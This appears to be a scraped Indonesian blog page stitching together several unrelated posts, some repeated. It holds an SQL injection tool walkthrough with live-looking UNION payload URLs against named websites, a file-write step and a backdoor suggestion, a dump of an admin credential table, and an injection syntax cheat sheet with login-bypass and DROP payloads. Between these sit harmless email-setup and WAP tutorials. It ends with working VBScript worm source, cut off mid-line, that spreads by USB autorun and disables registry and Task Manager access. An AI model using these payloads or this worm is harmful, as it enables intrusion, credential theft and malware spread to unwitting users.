http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,”Simple SQLi Dumper”,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+”/tmp/ssdp.txt”–
URL above means we write “Simple SQLi Dumper” into ssdp.txt that locate at /tmp directory.
to see if it works or no lets read /tmp/ssdp.txt using load_file function. don’t forget to convert it first.
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
and you will see result like this.
1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
that the word we write in /tmp/ssdp.txt.
what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. :) )
[0x07] brute MySQL v4
guessing table & column for MySQL v4.
you can add your own table name & column name by editing file called tables.dict & columns.dict.
# perl ssdp.pl -u [c0li URL] -brute
[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: –
Finding Tables & Columns …
[1] admin_user: username,password,email,adminid,adminname,phone,
Done.
found table “admin_user”
found column “username” “password” “email” “adminid” “adminname” “phone”
[0x08] conclusion
by using SSDp, it’s very easy to find SQL injection vulnerability at certain vulnerable parameter or string.
this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.
but, i suggest using this tool in a right way. okey dude?? :p
[0x09] references
perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
[0x10] greetz ^^
SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )
SSDp How To by NoGe ( mario[at]antisecurity[dot]org )
Vrs-hCk OoN_Boy paman zxvf angel stardustmemory
s4va xr00tb0y S3T4N pizzyroot matthews martfella
sql injektor
Simple SQL Injection Tutorial
Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
- Enjoy -
Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
- Enjoy -
membuat e mail sendiri
Tentunya kita pingin dong punya email dengan nama domain kita sendiri, misal namamu@domainmu.com. Nha sekarang ini google menyediakan fasilitas untuk membuat email seperti itu dengan cara yang lumayan mudah. Tapi sayangnya saat ini fasilitas tersebut belum bisa digunakan untuk blog yg masih menggunakan domain blabla.blogspot.com. Fasilitas ini hanya untuk yang memiliki domain sendiri, misal domainmu.com , .net. .org . dan top level doamin lainnya. Makanya itu bagi yang pengen, cepetan beli domain, aku sarankan beli di dodoldomain.com, murah lho (promosi...he..he..). Trus yang pake domain "co.cc" bisa gak? aku bilang "bisa", tapi sekarang aku pingin bahas yang pake domain .com/.net/.org, dll dulu. bagi yang punya domain "co.cc" sabar dulu ya.
Ok mari kita mulai tutorialnya bagaimana cara membuat email sendiri.
1. Buka alamat ini : http://www.google.com/a/cpanel/domain/new
2. maka km akan langsung disuguhi form seperti ini:
3. Isikan nama domain kamu didalam form tersebut lalu klik tombol "Get Started"
4. Kemudian akan muncul fomr lagi untuk mengisikan data-data yang diperlukan, Kalo sudah diisi klik "Continue"
5. Setelah itu akan muncul menu2 seperti ini :
6. Klik pada link "Activate email".
7. Setelah itu akan muncul lagi halaman untuk "Setup Email Delivery" , itu untuk setting MX Record. Caranya yaitu dengan mengisikan MX Record km dengan data2 yang ada disana. Datanya seperti ini :
MX Server address Priority
ASPMX.L.GOOGLE.COM. 10
ALT1.ASPMX.L.GOOGLE.COM. 20
ALT2.ASPMX.L.GOOGLE.COM. 20
ASPMX2.GOOGLEMAIL.COM. 30
ASPMX3.GOOGLEMAIL.COM. 30
ASPMX4.GOOGLEMAIL.COM. 30
ASPMX5.GOOGLEMAIL.COM. 30
Bagi yang menggunakan DNS setting dari DNS park caranya yaitu : Klik domain kamu yg berada di "Domain list". Setelah itu pilihan "Type" pilih yg "MX". Pada kolom "Mail Domain" kosongi saja kolom tersebut. Pada kolom "Order" isikan data2 "Priority" diatas. Trus pada kolom "mail server" isikan dengan data "MX Server Address" diatas kemudian klik tombol "Update All". begitu terus sampai data diatas dimasukkan semua.
Bagi yang menggunakan DNS setting dari dodoldomain.com caranya : masuk ke menu "Domain-->LIst last 10", trus klik link "Managed DNS", kemudian klik tombol Manage DNS Record. Setelah itu klik tombol "MX Records" trus klik tombol "Add MX Record". Untuk kolom "Value" pilih yg bawah (yg "Type In A Fully Qualified Domain Name eg. abc.pqr.com.') . isikan data "MX Server address" di kolom tersebut. kemudian isikan data "Priority" dikolom "MX Priority". begitu terus sampai selesai semua data dimasukkan.
8. kalo sudah selesai klik tombol " I have completed these steps". Maka akan muncul page seperti ini lagi.
9. Sebenarnya sampai disini sudah bisa selesai, tp untuk membuka email km, km harus mengetikkan alamt URL seperti ini "http://mail.google.com/a/domainmu.com" . Nha klao misalnya km pingin menggantinya menjadi seperti : "http://mail.domainmu.com" maka ikuti lagi langkah berikut ini.
10. Klik link "Email" maka akan muncul halaman "Email setting"
11. Trus klik link "Change URL" , kemudian akan muncul halaman untuk "Change URL for email".
12. PIlih yg "custom" trus klik tombol "Continue".
13. Setelah itu km setting dulu DNS km, Tambahkan "CNAME Records" dan isikan "mail" di kolom "Hostname" dan isikan "ghs.google.com" dikolom http://naldoton.blogspot.com"Value"
14. Setelah itu klik tombol "I have complete these step"
Nha sekarang km sudah bisa memiliki email dengan nama doamin blogmu sendiri. Untuk setting2 lainnya pelajari sendiri ya. Udah capek nih.....
Ok mari kita mulai tutorialnya bagaimana cara membuat email sendiri.
1. Buka alamat ini : http://www.google.com/a/cpanel/domain/new
2. maka km akan langsung disuguhi form seperti ini:
3. Isikan nama domain kamu didalam form tersebut lalu klik tombol "Get Started"
4. Kemudian akan muncul fomr lagi untuk mengisikan data-data yang diperlukan, Kalo sudah diisi klik "Continue"
5. Setelah itu akan muncul menu2 seperti ini :
6. Klik pada link "Activate email".
7. Setelah itu akan muncul lagi halaman untuk "Setup Email Delivery" , itu untuk setting MX Record. Caranya yaitu dengan mengisikan MX Record km dengan data2 yang ada disana. Datanya seperti ini :
MX Server address Priority
ASPMX.L.GOOGLE.COM. 10
ALT1.ASPMX.L.GOOGLE.COM. 20
ALT2.ASPMX.L.GOOGLE.COM. 20
ASPMX2.GOOGLEMAIL.COM. 30
ASPMX3.GOOGLEMAIL.COM. 30
ASPMX4.GOOGLEMAIL.COM. 30
ASPMX5.GOOGLEMAIL.COM. 30
Bagi yang menggunakan DNS setting dari DNS park caranya yaitu : Klik domain kamu yg berada di "Domain list". Setelah itu pilihan "Type" pilih yg "MX". Pada kolom "Mail Domain" kosongi saja kolom tersebut. Pada kolom "Order" isikan data2 "Priority" diatas. Trus pada kolom "mail server" isikan dengan data "MX Server Address" diatas kemudian klik tombol "Update All". begitu terus sampai data diatas dimasukkan semua.
Bagi yang menggunakan DNS setting dari dodoldomain.com caranya : masuk ke menu "Domain-->LIst last 10", trus klik link "Managed DNS", kemudian klik tombol Manage DNS Record. Setelah itu klik tombol "MX Records" trus klik tombol "Add MX Record". Untuk kolom "Value" pilih yg bawah (yg "Type In A Fully Qualified Domain Name eg. abc.pqr.com.') . isikan data "MX Server address" di kolom tersebut. kemudian isikan data "Priority" dikolom "MX Priority". begitu terus sampai selesai semua data dimasukkan.
8. kalo sudah selesai klik tombol " I have completed these steps". Maka akan muncul page seperti ini lagi.
9. Sebenarnya sampai disini sudah bisa selesai, tp untuk membuka email km, km harus mengetikkan alamt URL seperti ini "http://mail.google.com/a/domainmu.com" . Nha klao misalnya km pingin menggantinya menjadi seperti : "http://mail.domainmu.com" maka ikuti lagi langkah berikut ini.
10. Klik link "Email" maka akan muncul halaman "Email setting"
11. Trus klik link "Change URL" , kemudian akan muncul halaman untuk "Change URL for email".
12. PIlih yg "custom" trus klik tombol "Continue".
13. Setelah itu km setting dulu DNS km, Tambahkan "CNAME Records" dan isikan "mail" di kolom "Hostname" dan isikan "ghs.google.com" dikolom http://naldoton.blogspot.com"Value"
14. Setelah itu klik tombol "I have complete these step"
Nha sekarang km sudah bisa memiliki email dengan nama doamin blogmu sendiri. Untuk setting2 lainnya pelajari sendiri ya. Udah capek nih.....
MOBILE PROGRAMMING
Mobile adalah perangkat yang bergerak, misalnya telepon seluler atau komputer bergerak yang digunakan untuk mengakses jasa jaringan. Jadi mobile programming adalah program yg di gunakan utk perangkat mobile.contohnya mobile programing untuk ponsel :
1. J2ME , ini rasanya paling umum dan paling banyak HP yang support teknologi ini, blackberry pun masih menggunakan J2ME dengan tambahan API
2. C++ dalam symbian framework, ini khusus untuk HP dengan OS symbian
3. Flash Lite, game flash di mobile. Playernya sendiri setau saya baru ada di nokia NSeries
4. Objective C (mirip C tapi beda struktur bahasa program ) , ini untuk iphone,dan hanya bisa didevelop via OS Macintosh
5. C++ dalam Brew framework, ini untuk HP CDMA
6. C# .NET, untuk HP dengan OS Windows mobile
7. Javafx mobile, masih dikit yang support, mgkn baru HP Android
EMULATOR
Aplikasi yang memungkinkan sebuah software dari sebuah platform berjalan di atas platflorm lain. Emulator menjalankan kode-kode software pada virtual machine. Sehingga software tersebut mengira bahwa Ia sedang berjalan di atas platform aslinya.Sebagai contoh suatu program Windows dapat dijalankan di sistem operasi Linux dengan menggunakan piranti lunak emulator Wine. Ada pula program yang mengemulasikan suatu komputer dalam komputer, misalnya VMware. Contoh lain adalah program-program emulator untuk menjalankan permainan komputer yang awalnya hanya bisa dijalankan pada konsolnya masing-masing, misalnya Nintendo, Atari, PlayStation, XBox dan lain-lain.
WAP
Teknologi WAP (Wireless Aplication Protocol ) merupakan sebuah metode untuk menghadirkan halaman web di dalam layar Ponsel (Telepon Seluler). Dengan begitu, maka bentuk informasi dari sebuah instansi tidak hanya ditampilkan dengan metode Web yang hanya dapat di akses melalui Browser, akan tetapi dapat ditampilkan dalam bentuk WAP yang dapat dilihat dengan ponsel.
Dengan adanya dukungan GPRS dari pesawat Handphone, maka memungkinkan kita untuk mengakses semua informasi yang disajikan dalam internet dalam bentuk WAP.
WAP dapat dibuat dengan menggabungkan pemrograman WML (Wireless Markup Language)dengan pemrograman PHP sehingga dapat menghadirkan aplikasi WAP yang dinamis.
Pengertian WAP
WAP adalah suatu protokol aplikasi yang memungkinkan internet dapat diakses oleh ponsel dan perangkat wireless lainnya. Tujuan utamanya untuk membangun aplikasi yang dapat mengakses internet dari telepon genggam atau PDA. WAP membawa informasi secara online melewati internet langsung menuju ke ponsel atau klien WAP lainnya. Dengan adanya WAP pengguna dapat menggunakan ponselnya untuk mengakses Internet dan memperoleh fasilitas dari masing-masing telepon genggam. Dari sekedar membuka halaman situs untuk melihat informasi, seperti informasi berita atau kurs, cuaca, membuka e-mail, bahkan sampai melakukan transaksi keuangan.
Ada tiga bagian utama dalam akses WAP yaitu perangkat wireless yang mendukung WAP, WAP gateway sebagai perantara dan server sebagai sumber dokumen. Dokumen yang berada dalam web server dapat berupa dokumen HTML maupun WML. Dokumen WML khusus ditampilkan melalui browser dari perangkat WAP. Sedangkan dokumen HTML yang seharusnya ditampilkan melalui web browser , sebelum dibaca melalui browser WAP diterjemahkan terlebih dahulu oleh gateway agar dapat menyesuaikan dengan perangkat WAP.
SOFTWARE UNTUK BELAJAR WAP
Dalam belajar pemrograman WAP dengan menggunakan WML, PHP dan MySQL maka software yang harus disiapkan adalah :
1. Web Server (Apache, Appserv, Wamp, X Amp dll)
Dalam hal ini akan digunakan Apache karena mudah serta banyak digunakan oleh pemula. Apache ini akan sangat berguna jika kita membuat program yang menggunakan database yaitu mysql. Untuk mengaktifkannya maka kita aktifkan apache dan pada direktori mysql/bin kita aktifkan winmysqladmin yang telah kita install.
2. Web Browser ( Internet Explorer, Mozilla Firefox)
Untuk mengecek apakah server berjalan dengan baik maka kita dapat mencoba menjalakannya pada IE dengan mengetikkan alamat http://localhost.
3. Emulator WAP (M3Gate, Winwap)
Emulator mempunyai fungsi yang sama dengan browser IE, Mozila, Opera dll.
Dengan menggunakan emulator kita tidak harus mencoba program wap yang kita buat dengan handphone. Untuk belajar kita hanya cukup menggunakan browser berbentuk handphone (emulator) ini untuk menguji semua script WML yang telah kita buat. Contoh tampilan dari m3gate untuk skin Handy dan skin April
Dasar Pemrograman WAP
WAP homepage sangat berbeda dengan HTML homepage. Bahasa markup dokumen pada WAP adalah WML (Wireless Markup Language). WML menggunakan tag – seperti HTML – tetapi tata penulisannya mengikuti aturan standar XML 1.0.
WML page memiliki ekstensi *.WML, seperti halnya halaman HTML yang memiliki ekstensi *.HTML. Walau secara umum beberapa perintah WML terlihat mirip dengan HTML. Namun terdapat perbedaaan dalam struktur penulisan dokumen WML. Jika sebuah dokumen HTML hanya terdiri atas dua bagian utama, yaitu header dan body, dokumen WML mempunyai header, template (optional), dan beberapa body yang disebut dengan cards. Susunan dokumen secara lengkap ini disebut dengan deck. Sama seperti halnya HTML, untuk menyususun dokumen WML diperlukan kode khusus yang dinamakan dengan tag. WML page disebut dengan DECK. Mereka dibangun sebagai kumpulan CARD, yang mana dihubungkan antara satu dengan yang lain dengan link. Ketikan sebuah halaman WML diakses dari mobile phone, semua card di dalam halaman didownload dari WAP server. Navigasi antar card dilakukan dengan phone computer – komputer di dalam hand phone – tanpa meminta akses tambahan ke server
Cara Menuliskan WML
Cara Menuliskan Program WML memang agak sedikit berbeda dengan HTML. Yang membedakan hanyalah pengenal bahwa script tersebut adalah program WML. Hal tersebut mirip dengan program HTML yang setiap kali menuliskan scriptnya harus menggunakan tag dan diakhiri dengan tag .
Begitu juga dengan WML untuk menuliskannya kita dapat memulainya dengan tag dan diakhiri dengan tag . Program WML ditulis kedalam versi XML, sehingga setiap kali menuliskan harus mendeklarasikan kedalam bentuk XML. Hal tersebut merupakan kewajiban, apabila tidak maka Emulator atau Hand Phone tidak dapat mengenalinya.
1. J2ME , ini rasanya paling umum dan paling banyak HP yang support teknologi ini, blackberry pun masih menggunakan J2ME dengan tambahan API
2. C++ dalam symbian framework, ini khusus untuk HP dengan OS symbian
3. Flash Lite, game flash di mobile. Playernya sendiri setau saya baru ada di nokia NSeries
4. Objective C (mirip C tapi beda struktur bahasa program ) , ini untuk iphone,dan hanya bisa didevelop via OS Macintosh
5. C++ dalam Brew framework, ini untuk HP CDMA
6. C# .NET, untuk HP dengan OS Windows mobile
7. Javafx mobile, masih dikit yang support, mgkn baru HP Android
EMULATOR
Aplikasi yang memungkinkan sebuah software dari sebuah platform berjalan di atas platflorm lain. Emulator menjalankan kode-kode software pada virtual machine. Sehingga software tersebut mengira bahwa Ia sedang berjalan di atas platform aslinya.Sebagai contoh suatu program Windows dapat dijalankan di sistem operasi Linux dengan menggunakan piranti lunak emulator Wine. Ada pula program yang mengemulasikan suatu komputer dalam komputer, misalnya VMware. Contoh lain adalah program-program emulator untuk menjalankan permainan komputer yang awalnya hanya bisa dijalankan pada konsolnya masing-masing, misalnya Nintendo, Atari, PlayStation, XBox dan lain-lain.
WAP
Teknologi WAP (Wireless Aplication Protocol ) merupakan sebuah metode untuk menghadirkan halaman web di dalam layar Ponsel (Telepon Seluler). Dengan begitu, maka bentuk informasi dari sebuah instansi tidak hanya ditampilkan dengan metode Web yang hanya dapat di akses melalui Browser, akan tetapi dapat ditampilkan dalam bentuk WAP yang dapat dilihat dengan ponsel.
Dengan adanya dukungan GPRS dari pesawat Handphone, maka memungkinkan kita untuk mengakses semua informasi yang disajikan dalam internet dalam bentuk WAP.
WAP dapat dibuat dengan menggabungkan pemrograman WML (Wireless Markup Language)dengan pemrograman PHP sehingga dapat menghadirkan aplikasi WAP yang dinamis.
Pengertian WAP
WAP adalah suatu protokol aplikasi yang memungkinkan internet dapat diakses oleh ponsel dan perangkat wireless lainnya. Tujuan utamanya untuk membangun aplikasi yang dapat mengakses internet dari telepon genggam atau PDA. WAP membawa informasi secara online melewati internet langsung menuju ke ponsel atau klien WAP lainnya. Dengan adanya WAP pengguna dapat menggunakan ponselnya untuk mengakses Internet dan memperoleh fasilitas dari masing-masing telepon genggam. Dari sekedar membuka halaman situs untuk melihat informasi, seperti informasi berita atau kurs, cuaca, membuka e-mail, bahkan sampai melakukan transaksi keuangan.
Ada tiga bagian utama dalam akses WAP yaitu perangkat wireless yang mendukung WAP, WAP gateway sebagai perantara dan server sebagai sumber dokumen. Dokumen yang berada dalam web server dapat berupa dokumen HTML maupun WML. Dokumen WML khusus ditampilkan melalui browser dari perangkat WAP. Sedangkan dokumen HTML yang seharusnya ditampilkan melalui web browser , sebelum dibaca melalui browser WAP diterjemahkan terlebih dahulu oleh gateway agar dapat menyesuaikan dengan perangkat WAP.
SOFTWARE UNTUK BELAJAR WAP
Dalam belajar pemrograman WAP dengan menggunakan WML, PHP dan MySQL maka software yang harus disiapkan adalah :
1. Web Server (Apache, Appserv, Wamp, X Amp dll)
Dalam hal ini akan digunakan Apache karena mudah serta banyak digunakan oleh pemula. Apache ini akan sangat berguna jika kita membuat program yang menggunakan database yaitu mysql. Untuk mengaktifkannya maka kita aktifkan apache dan pada direktori mysql/bin kita aktifkan winmysqladmin yang telah kita install.
2. Web Browser ( Internet Explorer, Mozilla Firefox)
Untuk mengecek apakah server berjalan dengan baik maka kita dapat mencoba menjalakannya pada IE dengan mengetikkan alamat http://localhost.
3. Emulator WAP (M3Gate, Winwap)
Emulator mempunyai fungsi yang sama dengan browser IE, Mozila, Opera dll.
Dengan menggunakan emulator kita tidak harus mencoba program wap yang kita buat dengan handphone. Untuk belajar kita hanya cukup menggunakan browser berbentuk handphone (emulator) ini untuk menguji semua script WML yang telah kita buat. Contoh tampilan dari m3gate untuk skin Handy dan skin April
Dasar Pemrograman WAP
WAP homepage sangat berbeda dengan HTML homepage. Bahasa markup dokumen pada WAP adalah WML (Wireless Markup Language). WML menggunakan tag – seperti HTML – tetapi tata penulisannya mengikuti aturan standar XML 1.0.
WML page memiliki ekstensi *.WML, seperti halnya halaman HTML yang memiliki ekstensi *.HTML. Walau secara umum beberapa perintah WML terlihat mirip dengan HTML. Namun terdapat perbedaaan dalam struktur penulisan dokumen WML. Jika sebuah dokumen HTML hanya terdiri atas dua bagian utama, yaitu header dan body, dokumen WML mempunyai header, template (optional), dan beberapa body yang disebut dengan cards. Susunan dokumen secara lengkap ini disebut dengan deck. Sama seperti halnya HTML, untuk menyususun dokumen WML diperlukan kode khusus yang dinamakan dengan tag. WML page disebut dengan DECK. Mereka dibangun sebagai kumpulan CARD, yang mana dihubungkan antara satu dengan yang lain dengan link. Ketikan sebuah halaman WML diakses dari mobile phone, semua card di dalam halaman didownload dari WAP server. Navigasi antar card dilakukan dengan phone computer – komputer di dalam hand phone – tanpa meminta akses tambahan ke server
Cara Menuliskan WML
Cara Menuliskan Program WML memang agak sedikit berbeda dengan HTML. Yang membedakan hanyalah pengenal bahwa script tersebut adalah program WML. Hal tersebut mirip dengan program HTML yang setiap kali menuliskan scriptnya harus menggunakan tag dan diakhiri dengan tag .
Begitu juga dengan WML untuk menuliskannya kita dapat memulainya dengan tag dan diakhiri dengan tag . Program WML ditulis kedalam versi XML, sehingga setiap kali menuliskan harus mendeklarasikan kedalam bentuk XML. Hal tersebut merupakan kewajiban, apabila tidak maka Emulator atau Hand Phone tidak dapat mengenalinya.
MEMBUAT VIRUS DARI NOTEPAD
Oke.. untuk ke3 kalinya saya menampilka tutorial cara membuat virus dari yang paling ganas sampe yang cuma sekedar jail..hhe. nah untuk kali ini dan sekarang saya pengen jelasin nihh cara membuat virus lewat notepad. yaudah deh langsung aja pada intinya..
Sesuai judulnya, maka kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke tempat colokan flashdisk dengan menyamar sebagai AutoRun sehingga apabila ada yang mencolokkan flash disk ke komputer yang terinfeksi maka akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini berjenis worm. Oke.. langsung aja kita praktekin..
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan
dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim
kata-kata berikut ini–//
dim
rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set
sebuah
teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi =
“[autorun]” & vbcrlf & “shellexecute=wscript.exe
k4l0n6.dll.vbs”
set
fs = createobject(”Scripting.FileSystemObject”)
set mf =
fs.getfile(Wscript.ScriptFullname)
dim text,size
size =
mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do
while not text.atendofstream
rekur = rekur & text.readline
rekur =
rekur & vbcrlf
loop
do
‘//–Copy diri untuk
menjadi file induk di
Windows Path (example: C:\Windows)
Set windowpath
= fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch-
k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath
& “\batch-
k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf =
fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis
setiap flash disc
tercolok–//
‘Menyebar ke setiap drive yang bertype 1
dan 2(removable)
termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If
(flashdrive.drivetype = 1 or
flashdrive.drivetype = 2) and flashdrive.path
<> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau
A:\–//
set
tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path
&”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set
tf=fs.getfile(flashdrive.path
&”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang
teks-nya tadi sudah disiapkan (Auto Setup
Information)–//
set tf
=fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set
tf=fs.createtextfile(flashdrive.path
&”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf =
fs.getfile(flashdrive.path
&”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi
Registry–//
set kalong =
createobject(”WScript.Shell”)
‘//–Manip –
Ubah Title Internet Explorer
menjadi THE KALONG v.s. ZAY–//
kalong.regwrite
“HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title”,” THE
KALONG v.s. ZAY “
‘//–Manip – Set agar
file hidden tidak ditampilkan di
Explorer–//
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0?, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run,
dan
memblokir Regedit dan Task Manager–//
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,
“1?, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1?, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,
“1?, “REG_DWORD”
kalong.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1?, “REG_DWORD”
kalong.RegWrite
